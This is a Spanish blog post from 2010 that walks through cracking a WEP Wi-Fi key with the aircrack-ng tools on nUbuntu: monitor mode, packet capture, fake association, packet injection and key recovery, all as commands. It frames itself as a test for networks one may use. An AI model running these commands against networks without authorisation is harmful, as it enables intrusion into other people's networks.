miércoles, 21 de abril de 2010

Nubuntu 8.12 beta / Resolviendo claves WEP


Conectarse a la red del vecino de forma ilícita está prohibido por la ley. Sirva esta entrada sólo para poner a prueba las redes a las que se os está permitida la conexión, haciendo notar que las encriptaciones WEP deben quedarse en el pasado por su alta vulnerabilidad. No me hago responsable del mal uso del contenido de esta publicación.


Enlace de descarga directa de la imagen ISO de nUbuntu 8.12 Beta:

Al cargar nubuntu se inicia sin escritorio. Para iniciar el escritorio Fluxbox introducir lo siguente:

$startx

MODO MONITOR (Terminal I)
Lo primero es poner nuestra tarjeta en modo monitor. Para ello, en una terminal tecleamos:

$airmon-ng start wlan0 (donde wlan0 es el nombre de la tarjeta en este caso. Para ver cual es el nombre que recibe: $ifconfig).
En mi caso me crea una nueva entrada en el ifconfig llamada mon0, que es donde está abilitado el modo monitor.


CAPTURAR PAQUETES (Terminal I)
Utilizando el siguiente comando, escanear la red inalámbrica, seleccionar la conexión en que queremos hacer la prueba de seguridad, y anotar el nombre (ESSID), la dirección MAC (BSSID), así como en el canal en que se encuentra (CH).
$airodump-ng mon0

$airodump-ng -w wep mon0 --channel #
Con este comando iniciamos el airodump-ng capturando paquetes a un archivo llamado wep-01.cap, en este caso. Con cada captura este valor variará a 02, 03... . # se sustituye por el canal que anotamos anteriormente.


GENERAR TRÁFICO (Terminal II)
Para asociarnos a esa conexión:
$aireplay-ng -1 0 -e ESSID -a MAC_CONEXIÓN_QUE_PROBAMOS -h MAC_DE_NUESTRA_TARJETA_WIFI mon0

Y para enviar paquetes:
$aireplay-ng -3 -b MAC_CONEXIÓN_QUE_PROBAMOS -h MAC_DE_NUESTRA_TARJETA_WIFI mon0

RESOLVIENDO CLAVE WEP (Terminal III)
$aircrack-ng -s wep-01.cap

Esta última línea de comando será la que resuelva la clave WEP. Para ello son necesarios al menos 10.000 paquetes, a veces 100.000.

No hay comentarios:

Publicar un comentario